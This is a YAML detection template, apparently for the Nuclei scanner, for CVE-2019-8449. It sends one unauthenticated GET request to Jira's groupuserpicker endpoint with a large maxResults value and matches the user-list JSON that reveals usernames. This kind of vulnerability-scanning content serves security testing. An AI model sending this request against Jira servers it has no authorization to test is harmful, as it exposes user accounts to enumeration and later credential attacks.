32 lines
1.0 KiB
YAML
32 lines
1.0 KiB
YAML
id: CVE-2019-8449
|
|
|
|
info:
|
|
name: JIRA Unauthenticated Sensitive Information Disclosure
|
|
author: harshbothra_
|
|
severity: medium
|
|
description: The /rest/api/latest/groupuserpicker resource in Jira before version 8.4.0 allows remote attackers to enumerate usernames via an information disclosure vulnerability.
|
|
reference:
|
|
- https://www.doyler.net/security-not-included/more-jira-enumeration
|
|
- https://jira.atlassian.com/browse/JRASERVER-69796
|
|
- http://packetstormsecurity.com/files/156172/Jira-8.3.4-Information-Disclosure.html
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
|
|
cvss-score: 5.3
|
|
cve-id: CVE-2019-8449
|
|
cwe-id: CWE-306
|
|
tags: cve,cve2019,atlassian,jira,disclosure
|
|
|
|
requests:
|
|
- method: GET
|
|
path:
|
|
- '{{BaseURL}}/rest/api/latest/groupuserpicker?query=1&maxResults=50000&showAvatar=true'
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: status
|
|
status:
|
|
- 200
|
|
- type: word
|
|
words:
|
|
- '{"users":{"users":'
|
|
part: body
|